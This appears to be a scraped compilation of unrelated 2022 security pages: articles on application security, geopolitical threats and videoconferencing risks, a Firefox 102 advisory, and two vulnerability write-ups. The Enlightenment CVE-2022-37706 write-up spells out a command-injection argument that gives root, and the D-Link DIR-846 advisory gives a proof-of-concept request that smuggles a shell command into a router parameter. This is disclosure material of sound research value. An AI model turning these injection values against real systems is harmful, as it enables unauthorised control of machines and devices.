A variety of initiatives — such as memory-safe languages and software bills of materials — promise more secure applications, but sustained improvements will require that vendors do much better, researchers agree.

Can we build a defensible Internet? To improve the security of the Internet and the cloud applications it supports in 2023, we need to do better, experts say. Much better.

At the beginning of 2022, companies famously scrambled to hunt down and mitigate a critical vulnerability in a widespread component of many applications: the Log4j library. The following 12 months of Log4Shell woes highlighted that most companies do not know all the software components that make up their Internet-facing applications, do not have processes to regularly check configurations, and fail to find ways to integrate and incentivize security among their developers. 

The result? With the post-pandemic increase in remote work, many companies have lost their ability to lock down applications and remote workers and consumers are more vulnerable to cyberattacks from every corner, says Brian Fox, chief technology officer for Sonatype, a software security firm.

"Perimeter defense and legacy behavior worked when you had physical perimeter security — basically everyone was going into an office — but how do you maintain that when you have a workforce that increasingly works from home or a coffee shop?" he says. "You've stripped away those protections and defenses."

As 2022 nears its close, companies continue to struggle against insecure applications, vulnerable software components, and the large attack surface area posed by cloud services.

**The Software Supply Chain's Gaping Holes Persist

Even though software supply chain attacks grew 633% in 2021, companies still do not have the processes in place to do even simple security checks, such as weeding out known vulnerable dependencies. In March, for example, Sonatype found that 41% of downloaded Log4jcomponents were vulnerable versions.

Meanwhile, companies are increasingly moving infrastructure to the cloud and adopting more Web applications, tripling their use of APIs, with the average company using 15,600 APIs, and traffic to APIs quadrupling in the last year.

This increasingly cloudy infrastructure makes users' human fallibility the natural attack vector into enterprise infrastructure, says Tony Lauro, director of security technology and strategy at Akamai.

"The unfortunate truth is that no matter what is happening in the enterprise and how well you lock it down and secure it, there is opportunity to attack the users," he says. "With ransomware and malware, phishing and scams, even if the back end is secure, they can take advantage of the user."

****Cyberthreats Against Applications Only Loom Larger**

To see an example of how little progress cybersecurity has made in the past three decades, companies do not have to look further than phishing. The social engineering technique has been around for almost as long as email, yet the vast majority of companies (83%) have suffered a successful email-based phishing attack in 2022. Phishing easily leads to credential harvesting and then to compromises of Web applications and cloud infrastructure.

The simple technique can bypass multiple layers of application security and give attackers access to sensitive data, systems, and networks, Daniel Cuthbert, global head of cyber security research at Banco Santander, said at this month's Black Hat Europe security conference.

"You should be able to click on something and not have it push a reverse shell out to somebody else," he lamented. "Is it that hard to ask?"

Attackers are also focusing on targeting applications in ways that get by many of the security controls that are operating at the edge of the network.

At the Black Hat Asia conference in May, researchers outlined ways to sneak attacks past web application firewalls (WAFs) to deliver malicious payloads to otherwise-protected applications and their databases. In December, cybersecurity firm Claroty demonstrated more general attacks using JSON to bypass five major WAFs, including those of Amazon Web Services and Cloudflare. In the same month, a pair of researchers used a vulnerable version of Spring Boot to bypass Akamai's WAF.

Companies have to be more tactical about how they rely on WAFs, says Akamai's Lauro. So-called "virtual patching" — when the WAF is used to block the exploit of vulnerabilities that are not yet, or cannot yet be, patched — is an important capability. Yet, too many companies use WAFs to protect poorly designed applications, he says.

"You need to identify how that vulnerability could be attacked from the Internet, and virtual patches helps there, but once you are inside the network, the first thing I'm going to do as an attacker is look for some of these zero-days and use them to move laterally," he says.

**Future AppSec Requires Innovation**

Efforts to protect the fundamental components of software by securing the software supply chain will be a key source of innovation in the near future. These advances take time to implement and are not silver bullets, but they can result in far more robust software development and end product, experts say.

Providing developers more information about the components they import into their own software through systems like Scorecard, for example, has significant security benefits. Scorecard checks a variety of software project attributes, such as whether there are binary code included in the software, have dangerous development workflows, or has signed releases. Just that information can determine whether a project is vulnerable with 78% accuracy, according to the Open Software Security Foundation (OpenSSF).

Sigstore, which allows each software component to be signed, is another technology that will help developers understand and secure their supply chains, says John Speed Meyers, principal security scientist at Chainguard, a software security firm.

"A key building block for preventing software supply chain compromises is the widespread use of digital signatures," he says. "This helps reduce the chance of software supply chain compromises and reduce the blast radius when they do happen."

**Companies Can Make Cyber-Secure Application Choices**

While those advances in the software development process can result in more secure software, the choice of language can make a significant difference as well. Memory-safe languages can all but eliminate pernicious classes of software flaws, such as buffer overflows and use-after-free vulnerabilities. 

Google, for example, found that the use of memory-safe languages, such as Java and Rust, rather than C and C++ resulted in lowering the number of vulnerabilities from 223 to 85 over three years.

Companies need to give developers more support and leeway in selecting secure tools and frameworks, not just focus on productivity and features, says Sonatype's Fox.

"There is a new reality that companies need to wake up to and deal with, and that is that the developers at the end of the day are the ones that have to make these changes, and the organizations need to recognize their problems and support them," he says. "Developers are finding their own tools, and they know that's a problem, but they are not getting the support from the company, so even in a world where developers want to do the right thing, their companies are holding them back."

At the executive level, companies also need to be using their buying power to focus on holding their vendors accountable for security of their products, Banco Santander's Cuthbert said during his Black Hat Europe keynote.

"When we look at buying product, and we look at buying software, the reality is that we have zero input to make sure that those vendors, those products are secure," he said. "We just don't have that power and we don't have meaningful influence."

Internet AppSec Remains Abysmal & Requires Sustained Action in 2023

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and December 1st, 2022.

**Manjusaka****Date published: August 2022**

Reminiscent of Cobalt Strike and Sliver framework (both commercially produced and designed for red teams but misappropriated and misused by threat actors), this emerging attack framework holds the potential to be widely used by malicious actors. Written in Rust and Golang with a User Interface in Simple Chinese (see the workflow diagram below), this software is of Chinese origin.

Manjasuka carries Windows and Linux implants in Rust and makes a ready-made C2 server freely available, with the possibility of creating custom implants.

**Geopolitical context**

Manjasuka was designed for criminal use from the get-go, and 2023 could be defined by increased criminal usage of it as it is freely distributed and would reduce criminal reliance on the misuse of commercially available simulation and emulation frameworks such as Cobalt Strike, Sliver, Ninja, Bruce Ratel C4, etc.

At the time of writing, there was no indication that the creators of Manjasuka are state-sponsored but, as clearly indicated below, China has not been resting this year.

**PowerLess Backdoor****Date published: February 2022**

Powerless Backdoor is the most popular of this year Iran-related threats, designed to avoid PowerShell detection. Its capabilities include downloading a browser info stealer and a keylogger, encrypting and decrypting data, executing arbitrary commands, and activating a kill process.

**Geopolitical context**

The number of immediate threats attributed to Iran has jumped from 8 to 17, more than double of the similar 2021 period. However, it has slowed considerably since the September 14th U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) sanctions against Iranian cyber actors, trickling down to a single attack imputed to Iran since then.

The current political tensions within Iran will no doubt impact the frequency of attacks in 2023, but at this stage, it is difficult to evaluate whether those will increase or decrease.

**APT 41 targeting U.S. State Governments****Date published: March 2022**

Already flagged as very active in 2021, APT41 is a Chinese state-sponsored attacker group activity that showed no sign of slowing down in 2022, and investigations into APT41 activity uncovered evidence of a deliberate campaign targeting U.S. state governments.

APT 41 uses reconnaissance tools, such as Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute, and Sublist3r. It also launches a large array of attack types, such as phishing, watering hole, and supply-chain attacks, and exploits various vulnerabilities to initially compromise their victims. More recently, they have been seen using the publicly available tool SQLmap as the initial attack vector to perform SQL injections on websites.

This November, a new subgroup, Earth Longhi, joined the already long list of monikers associated with APT 41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon). Earth Longhi was spotted targeting multiple sectors across Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine.

**Geopolitical context**

According to Microsoft digital Defense Report 2022, "Many of the attacks coming from China are powered by its ability to find and compile "zero-day vulnerabilities" – unique unpatched holes in software not previously known to the security community. China's collection of these vulnerabilities appears to have increased on the heels of a new law requiring entities in China to report vulnerabilities they discover to the government before sharing them with others."

**LoLzarus Phishing Attack on DoD Industry****Date published: February 2022**

Dubbed LolZarus, a phishing campaign attempted to lure U.S. defense sector job applicants. This campaign was initially identified by Qualys Threat Research, which attributed it to the North-Korean threat actor Lazarus (AKA Dark Seoul, Labyrinth Chollima, Stardust Chollima, BlueNoroff, and APT 38). Affiliated with North Korea's Reconnaissance General Bureau, this group is both politically and financially motivated and were best known for the high profile attack on Sondy in 2016 and WannaCry ransomware attack in 2017.

The LolZarus phishing campaign relied on at least two malicious _documents, Lockheed\_Martin\_JobOpportunities.docx_ and _salary\_Lockheed\_Martin\_job\_opportunities\_confidential.doc,_ that abused macros with aliases to rename the API used and relied on ActiveX Frame1\_Layout to automated the attack execution. The macro then loaded the WMVCORE.DLL Windows Media dll file to help deliver the second stage shellcode payload aimed at hijacking control and connecting with the Command & Control server.

**Geopolitical context**

Another two North Korean notorious attacks flagged by CISA this year include the use of Maui ransomware and activity in cryptocurrency theft. Lazarus subgroup BlueNoroff seems to have branched out of cryptocurrency specialization this year to also target cryptocurrency-connected SWIFT servers and banks. Cymulate associated seven immediate threats with Lazarus since January 1st, 2022.

**Industroyer2****Date published: April 2022**

Ukraine's high-alert state, due to the conflict with Russia, demonstrated its efficacy by thwarting an attempted cyber-physical attack targeting high-voltage electric substations. That attack was dubbed Industroyer2 in memory of the 2016's Industroyer cyber-attack, apparently targeting Ukraine power stations and minimally successful, cutting the power in part of Kyiv for about one hour.

The level of Industroyer2 customized targeting included statically specified executable file sets of unique parameters for specific substations.

**Geopolitical context**

Ukraine's cyber-resilience in protecting its critical facilities is unfortunately powerless against kinetic attacks, and Russia appears to have now opted for more traditional military means to destroy power stations and other civilian facilities. According to ENISA, a side-effect of the Ukraine-Russia conflict is a recrudescence of cyber threats against governments, companies, and essential sectors such as energy, transport, banking, and digital infrastructure, in general.

In conclusion, as of the five most concerning threats this year, four have been directly linked with state-sponsored threat actors and the threat actors behind the fifth one are unknown, it appears that geopolitical tensions are at the root of the most burning threat concerns for cybersecurity teams.

As state-sponsored attackers typically have access to cyber resources unattainable by most companies, pre-emptive defense against complex attacks should concentrate on security validation and continuous processes focused on identifying and closing in-context security gaps.

_Note: This article was written and contributed by David Klein, Cyber Evangelist at Cymulate._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

2022 Top Five Immediate Threats in Geopolitical Context

enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

**CVE-2022-37706**

Hello guys, this time I'm gonna talk about a recent 0-day I found in one of the  
main window managers of Linux called Enlightenment (https://www.enlightenment.org/).  
This 0-day gonna take any user to root privileges very easily and instantly.  
The exploit is tested on Ubuntu 22.04, but should work just fine on any distro.  

First of all Enlightenment is a Window Manager, Compositor and Minimal Desktop  
for Linux (the primary platform), BSD and any other compatible UNIX system.  

I installed this window manager to experiment a bit with it. It was interesting  
for me as it contain a lot of tools and it looks pretty neat to be honest.  

After I installed the package using apt install enlightenment I examined the  
installed files and directory on my system, a lot of modules and a lot of helper  
binaries, but what is most interesting is :  

    ➜  enlightenment cd /usr/lib/x86_64-linux-gnu/enlightenment/
    ➜  enlightenment find . -perm -4000                         
    ./utils/enlightenment_ckpasswd
    ./utils/enlightenment_system
    ./utils/enlightenment_sys
    

It installs some SUID binaries, then I was thinking if I can use one of those  
to escalate to root, the binaries were all secure looking and well coded.  
The binary we will be talking about is enlightenment\_sys.  

As any other target we choose a strategy to apply after doing some pre-assessment  
see my blog here if not yet (https://pwn-maher.blogspot.com/2020/10/vulnerability-assessment.html)  

I audited the code on a Top-Down approach.  
And because this window manager is open source, the source code will be available  
for all those binaries and modules.  
So first thing I did was apt source enlightenment to get all the source code,  
and with a bit of digging we can get to the target binary code.  

But to debug the binary I load it to Ghidra for analysis and to have addresses  
to set breakpoints and all.  
No symbols were found first try but yeah no need for those as it turned out to  
be a relatively small binary.  
Surprisingly, I found it very pleasing to look at the decompiled pseudo-code of  
Ghidra than looking directly at the src (avoid macros, avoid also those checks  
against the OS being used to compile a specific block of code).  

So let's start analysis.  

1- Play with the binary.  
Let's run the file to see some information about our target:  
  

Running the binary do not give any output:  
  

Giving --help argument gave this output:  
  
Sorry, I will use it to get root.  

Next let's just strace and see if it will use any suspicious syscalls like  
execve or openat:  
strace ./enlightenment\_sys 2>&1 | grep open  
  
It just opens known libraries at places we don't have permission to tamper with.  

strace ./enlightenment\_sys 2>&1 | grep exec  
  

2- Let's reverse engineer the binary and then exploit it.  

I created a new Ghidra project, and I loaded this specific binary.  
Because symbols were not found, we can spot the main function using entry.  
The first argument to entry function is main itself.  
I renamed it to main for future references.  
Scrolling a bit down I can already spot system() function being used.  

As a pwner I spend days on challenges to spawn this specific function x)  
I reversed the binary looking for a memory corruption bug or some heap problems  
, but actually it was a weird Command Injection.  
The binary take all security precautions before running system, but sadly we  
can always inject our input in there.  
  

Ok, now let's walk the binary from top up to our system function, trying to  
inject our input in there.  

First the binary just checks if the first arg is --help or -h and shows that  
message we saw earlier.  
  

Second it elevate it's privileges to root.  
  

Next it unset almost all environment variables (security precautions) to not  
invoke another non-intended binary.  
  

So if the first arg we entered is "mount" it will enter this branch, check some  
flags given, those flags gonna be set on the stack.  

Next it checks if the next param after mount is UUID= we don't want to enter  
here, so we gave "/dev/../tmp/;/tmp/exploit".  
  
Like this we pass the check at line 410. the strncmp check.  
Because if it don't start with /dev/ the binary will exit.  
Next there is a call to stat64 on that file we provided, note that we can  
create a folder called ";" and that will be causing the command injection.  
Until now, the exploit already created this file /dev/../tmp/;/tmp/exploit,  
but this is not the exploit that will be called.  
  
  

We're getting closer to system() now.  
Now p (pointer), gets updated to the last argument given to our SUID binary,  
/tmp///net.  

Why providing /tmp///net when we can pass /tmp/net?  
We will bypass this check:  
if (((next_next == (char *)0x0) || (next_next[1] == '\0')) || ((long)next_next - (long)p != 6))  
We needed /tmp/net to exist and /tmp/// to be on length 6.  

Now the last stat64 will check for the existence of "/dev/net"  
\_\_snprintf\_chk(cmd,0x1000,1,0x1000,"/dev%s",next\_next);  
And it will find it, so we pass that last check.  

Now it will check for the availability for some files, but that's not important  
at this point, because we're all set and all close to trigger arbitrary Command  
Execution.  

Now eina\_strbuf\_new() will just initialize the command that will be passed to  
system, the problem here is that we entered it as:  

/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net  

But the binary calls eina\_strbuf\_append\_printf() for several times and becomes  
/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), /dev/../tmp/;/tmp/exploit /tmp///net  
Notice that double quotes are removed, and we will be able to call /tmp/exploit  
as root.  
  

The binary tried it's best to mitigate any non-intended behavior but as usual  
anything can be pwned. I wasn't expecting to exploit this using a logical bug  
like this.  
I want the next CVE to be a memory corruption leading to LPE root.  

Twitter disclosure: https://twitter.com/maherazz2/status/1569665311707734023

CVE-2022-37706: GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)

Securing videoconferencing solutions is just one of many IT security challenges small businesses are facing, often with limited financial and human resources.

It's no secret that the acceleration of work-from-home and distributed workforce trends — infamously spurred on by the pandemic — has occurred in tandem with the rise of video communications and collaboration platforms, led by Zoom, Microsoft, and Cisco.

But given that videoconferencing now plays a critical role in how businesses interact with their employees, customers, clients, vendors, and others, these platforms carry significant potential security risks, researchers say.

Organizations use videoconferencing to discuss M&A, legal, military, healthcare, intellectual property and other topics, and even corporate strategies. A loss of that data could be catastrophic for a company, its employees, its clients, and its customers.

However, a recent Aite-Novarica Group report on videoconferencing security showed that 93% of IT professionals surveyed acknowledged security vulnerabilities and gaping risks in their videoconferencing solutions.

Among the most relevant risks is the lack of controlled access to conversations that could result in disruption, sabotage, compromise, or exposure of sensitive information, while use of nonsecure, outdated, or unpatched videoconferencing applications can expose security flaws.

"The risks include the potential for interruptions, unauthorized access, and perhaps most concerning, the opportunity for a bad actor to acquire sensitive information," says Craig Lurey, CTO and co-founder at Keeper Security.

**Threats Targeting Video Communications Platforms Multiply**

The use of videoconferencing software by remote workers makes it an easy target for various types of attacks in the wild. For instance, "Zoom-bombing" and other attacks came to the fore in the wake of the first work-from-home wave during the pandemic.

Other threats include DDoS attacks, according to the FBI's Internet Crime Report, and malware. In May, for instance, threat hunters discovered a vulnerability chain in Zoom's chat functionality that could be exploited to allow zero-click remote code execution (RCE).

Security firm Vectra also recently discovered a vulnerability in Microsoft Teams, which found that the platform stores authentication tokens unencrypted, allowing any user to access the secrets file without the need for special permissions. The weakness gives attackers the ability to move through a company’s network much more easily.

But while zero-day exploits and other high-profile attacks get a lot of attention, Mike Parkin, senior technical engineer at Vulcan Cyber points out that many, if not most, attacks still target the users.

"That usually means phishing emails or other social engineering attacks that lead to compromise, or business email compromise attacks that can lead to direct losses through fraud," he says.

**SMBs at Particular Risk From Videoconferencing Threats**

The risk is especially piquant for small and medium-sized businesses (SMBs), researchers say. This segment relied heavily on video collaboration to cut travel costs even before the pandemic, and now represents a class of superusers.

At the same time, SMBs may not have the security awareness or in-house expertise necessary to shore up their defenses. Parkin says SMBs often wrestle to implement and manage a proper cybersecurity program.

"That lack of resources can manifest in not knowing, or being able to implement, proper security on their videoconferencing usage," he says.

George Waller, co-founder and executive vice president of Zerify, agrees that SMBs typically don't have the financial and technical resources that larger companies have.

"Therefore, they are far more vulnerable to even the most basic attacks such as email, phishing and ransomware," he says. "Post-pandemic, many SMBs are still working with limited staff and budgets. Therefore, it's easier to trip them up and cause a devastating data breach."

Meanwhile, this sector often faces financial constraints that could make a cyberattack an extinction-level event. According to a recent IBM breach report, the average size of a data breach in the US is now $9.44 million, and 60% of small businesses go out of business within six months of a data breach.

"When cybercriminals steal sensitive, confidential, or classified data, they can make you pay a ransom to get it back," Waller explains. "They can also sell it to other nefarious people, who can use that data to embarrass or profit from your organization."

Unfortunately, amid the challenges, SMBs are often more of a target than they realize.

"While an attacker’s potential take is smaller, the effort is low, the risk is low, and SMB organizations often have less investment in cybersecurity than a larger organization," Parkin explains. "They can be particularly susceptible to ransomware and business email compromise attacks."

**2FA, Zero Trust Help Secure Video Conferencing**

Fortunately, there are some basic steps that businesses of any size can take to ensure the videoconferencing system they're using doesn't fall into the "low-hanging fruit" category for cybercriminals.

For one, they should ensure their platforms and apps offer two-factor authentication (2FA) for both the meeting creator as well as for the meeting participant, and make sure that login links cannot be shared; most videoconferencing platforms have such basic security features and offer advice on how to use them.

Ricardo Villadiego, CEO and founder of Lumu, says businesses for instance should enable security features such as ID and password and end-to-end encryption that allow SMBs to control access to conversations.

"Avoid repeating passwords, lock down microphones and speakers, and authenticate every user prior to entering a videoconference," he says. "Limit the kind of files and links that can be shared via videoconferencing tools, keep meeting recordings only accessible with a password, and don't discuss information that you wouldn't discuss over the telephone."

Waller adds that snooping on video calls via spyware is a threat that SMBs should be aware of, too.

"Make sure that your camera, microphone, and audio-out data streams are locked down and cannot be spied on with malware," he says. "Organizations should also use an anti-keylogging and anti-screen scraping technology and make sure that AV software is up to date."

Lurey, meanwhile, advises SMBs to protect videoconferencing platforms with a zero-trust security architecture that requires all users be authenticated, authorized, and continuously validated before they can access the application.

"Choose a provider wisely and check that it provides end-to-end encryption," he says. "Most major platforms do."

He adds that it's also imperative to configure the platform correctly by enabling built-in security capabilities and providing consistent enforcement to ensure those security features are never disabled.

Finally, Parkin advises that there are other vulnerabilities in some videoconferencing platforms that require specific steps to counter and stresses the importance of keeping the videoconferencing software up to date. Security teams should also proactively monitor network behavior for anomalous activity and make sure to read terms and conditions of the videoconferencing platform being used.

He adds that with a changing threat landscape, the challenge for SMBs in particular is finding the balance between defending against known threats, being positioned to stay ahead of emerging ones, and managing the risk specific to their environment.

"Small businesses are often resource restricted when it comes to cybersecurity, which means they need to be efficient with the resources they do have," he says. "But focusing on things like user education, which can deliver a lot of value for the investment, can help."

Videoconferencing Worries Grow, With SMBs in Cyberattack Crosshairs

D-Link DIR-846 A1_FW100A43 was discovered to contain a command injection vulnerability via the auto_upgrade_hour parameter in the SetAutoUpgradeInfo function.

**D-Link dir-846 wireless router SetAutoUpgradeInfo command injection vulnerability****1\. Basic information**

*   Vulnerability Type: Command Injection
*   Vulnerability Description: In D-Link dir-846 wireless router, firmware version A1\_FW100A43, there is a command injection vulnerability. Its SetAutoUpgradeInfo component implements a security vulnerability in processing the auto\_upgrade\_hour parameter, allowing remote attackers to use the vulnerability to submit special requests, resulting in command injection, which can lead to the execution of arbitrary system commands.
*   Device model:
    *   D-Link dir-846 wireless router
    *   Firmware version: A1\_FW100A43

**2\. Vulnerability Value**

*   Maturity of Public Information: None
*   Order of Public Vulnerability Analysis Report: None
*   Stable reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    *   Remote Code Execution (RCE)

**3\. PoC**

    POST /HNAP1/ HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    SOAPACTION: "http://purenetworks.com/HNAP1/SetAutoUpgradeInfo"
    HNAP_AUTH: 11583A1E429EF67F912D6EE6D079E244 1666080008220
    Content-Length: 88
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/Parentcontrol.html?t=1666079999406
    Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D; SESSION_ID=2:1598955110:2; uid=57XIVmwX; PrivateKey=BE92EF6F235196D24907CBEE3556D5ED; timeout=97; PHPSESSID=1265348da22b64f02a23502dddc0772e
    Cache-Control: max-age=0
    
    {"SetAutoUpgradeInfo":{"auto_upgrade_hour":"`reboot`"}}
    

**4\. Vulnerability Principle**

When the Web management component receives a POST request, its SetAutoUpgradeInfo component implements a security vulnerability in processing the auto\_upgrade\_hour parameter, and the auto\_upgrade\_hour parameter is concatenated to execute the command. Such carefully crafted parameters lead to command injection. Attackers can use this vulnerability to directly achieve the effect of remote arbitrary command execution.

See the figure below for the auto\_upgrade\_hour parameter location: 

**5\. The basis for judging as a 0-day vulnerability****1\. Not the same vulnerability as CVE-2021-46314 and CVE-2021-46315**

Search the dir-846 keyword in the NVD database and find the vulnerabilities CVE-2021-46314 and CVE-2021-46315. Refer to the github warehouse information that disclosed the vulnerability: https://github.com/doudoudedi/DIR-846\_Command\_Injection/blob/main/DIR-846\_Command\_Injection1.md, the trigger code of this vulnerability is located in SetMasterWLanSettings and SetNetworkTomographySettings, the location The location of the code triggering this vulnerability is different, so it is not the same vulnerability.

**2\. Keyword search**

Using SetAutoUpgradeInfo as a keyword to search the NVD database, there is no query result.

CVE-2022-46642: IoTvuln/D-Link dir-846 SetAutoUpgradeInfo command injection vulnerability.md at main · CyberUnicornIoT/IoTvuln

An iframe that was not permitted to run scripts could do so if the user clicked on a <code>javascript:</code> link. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11.

**Mozilla Foundation Security Advisory 2022-24**

Announced

June 28, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 102

_Note_: While Bug 1771084 does not represent a specific vulnerability that was fixed, we recommend anyone rebasing patches to include it. 102 branch: Patch 1 and 2. 91 Branch: Patch 1 and 2 (Despite saying Parts 2 and 3, there is no Part 1)

**#CVE-2022-34479: A popup window could be resized in a way to overlay the address bar with web content**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A malicious website that could create a popup could have resized the popup to overlay the address bar with its own content, resulting in potential user confusion or spoofing attacks.  
_This bug only affects Firefox for Linux. Other operating systems are unaffected._

**References**

*   Bug 1745595

**#CVE-2022-34470: Use-after-free in nsSHistory**

Reporter

Armin Ebert

Impact

high

**Description**

Session history navigations may have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1765951

**#CVE-2022-34468: CSP sandbox header without \`allow-scripts\` can be bypassed via retargeted javascript: URI**

Reporter

Armin Ebert

Impact

high

**Description**

An iframe that was not permitted to run scripts could do so if the user clicked on a javascript: link.

**References**

*   Bug 1768537

**#CVE-2022-34482: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Attila Suszter

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34483.

**References**

*   Bug 845880

**#CVE-2022-34483: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Eduardo Braun Prado

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34482.

**References**

*   Bug 1335845

**#CVE-2022-34476: ASN.1 parser could have been tricked into accepting malformed ASN.1**

Reporter

Gustavo Grieco

Impact

moderate

**Description**

ASN.1 parsing of an indefinite SEQUENCE inside an indefinite GROUP could have resulted in the parser accepting malformed ASN.1.

**References**

*   Bug 1387919

**#CVE-2022-34481: Potential integer overflow in ReplaceElementsAt**

Reporter

Ronald Crane

Impact

moderate

**Description**

In the nsTArray_Impl::ReplaceElementsAt() function, an integer overflow could have occurred when the number of elements to replace was too large for the container.

**References**

*   Bug 1497246
*   Bug 1483699

**#CVE-2022-34474: Sandboxed iframes could redirect to external schemes**

Reporter

Amazon Malvertising Team

Impact

moderate

**Description**

Even when an iframe was sandboxed with allow-top-navigation-by-user-activation, if it received a redirect header to an external protocol the browser would process the redirect and prompt the user as appropriate.

**References**

*   Bug 1677138

**#CVE-2022-34469: TLS certificate errors on HSTS-protected domains could be bypassed by the user on Firefox for Android**

Reporter

Peter Gerber

Impact

moderate

**Description**

When a TLS Certificate error occurs on a domain protected by the HSTS header, the browser should not allow the user to bypass the certificate error. On Firefox for Android, the user was presented with the option to bypass the error; this could only have been done by the user explicitly.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1721220

**#CVE-2022-34471: Compromised server could trick a browser into an addon downgrade**

Reporter

Rob Wu

Impact

moderate

**Description**

When downloading an update for an addon, the downloaded addon update's version was not verified to match the version selected from the manifest. If the manifest had been tampered with on the server, an attacker could trick the browser into downgrading the addon to a prior version.

**References**

*   Bug 1766047

**#CVE-2022-34472: Unavailable PAC file resulted in OCSP requests being blocked**

Reporter

Laurent Bigonville

Impact

moderate

**Description**

If there was a PAC URL set and the server that hosts the PAC was not reachable, OCSP requests would have been blocked, resulting in incorrect error pages being shown.

**References**

*   Bug 1770123

**#CVE-2022-34478: Microsoft protocols can be attacked if a user accepts a prompt**

Reporter

Gijs

Impact

moderate

**Description**

The ms-msdt, search, and search-ms protocols deliver content to Microsoft applications, bypassing the browser, when a user accepts a prompt. These applications have had known vulnerabilities, exploited in the wild (although we know of none exploited through Firefox), so in this release Firefox has blocked these protocols from prompting the user to open them.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1773717

**#CVE-2022-2200: Undesired attributes could be set as part of prototype pollution**

Reporter

Manfred Paul via Trend Micro's Zero Day Initiative

Impact

moderate

**Description**

If an object prototype was corrupted by an attacker, they would have been able to set undesired attributes on a JavaScript object, leading to privileged code execution.

**References**

*   Bug 1771381

**#CVE-2022-34480: Free of uninitialized pointer in lg\_init**

Reporter

Ronald Crane

Impact

low

**Description**

Within the lg_init() function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated.

**References**

*   Bug 1454072

**#CVE-2022-34477: MediaError message property leaked information on cross-origin same-site pages**

Reporter

jannis

Impact

low

**Description**

The MediaError message property should be consistent to avoid leaking information about cross-origin resources; however for a same-site cross-origin resource, the message could have leaked information enabling XS-Leaks attacks.

**References**

*   Bug 1731614

**#CVE-2022-34475: HTML Sanitizer could have been bypassed via same-origin script via use tags**

Reporter

Gareth Heyes

Impact

low

**Description**

SVG <use> tags that referenced a same-origin document could have resulted in script execution if attacker input was sanitized via the HTML Sanitizer API. This would have required the attacker to reference a same-origin JavaScript file containing the script to be executed.

**References**

*   Bug 1757210

**#CVE-2022-34473: HTML Sanitizer could have been bypassed via use tags**

Reporter

Armin Ebert

Impact

low

**Description**

The HTML Sanitizer should have sanitized the href attribute of SVG <use> tags; however it incorrectly did not sanitize xlink:href attributes.

**References**

*   Bug 1770888

**#CVE-2022-34484: Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11**

Reporter

Mozilla developers and community

Impact

high

**Description**

The Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101 and Firefox ESR 91.10. Some of these bugs showed evidence of JavaScript prototype or memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102 and Firefox ESR 91.11

**#CVE-2022-34485: Memory safety bugs fixed in Firefox 102**

Reporter

Mozilla developers and community

Impact

moderate

**Description**

Mozilla developers Bryce Seager van Dyk and the Mozilla Fuzzing Team reported potential vulnerabilities present in Firefox 101. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 102

CVE-2022-34468: Security Vulnerabilities fixed in Firefox 102

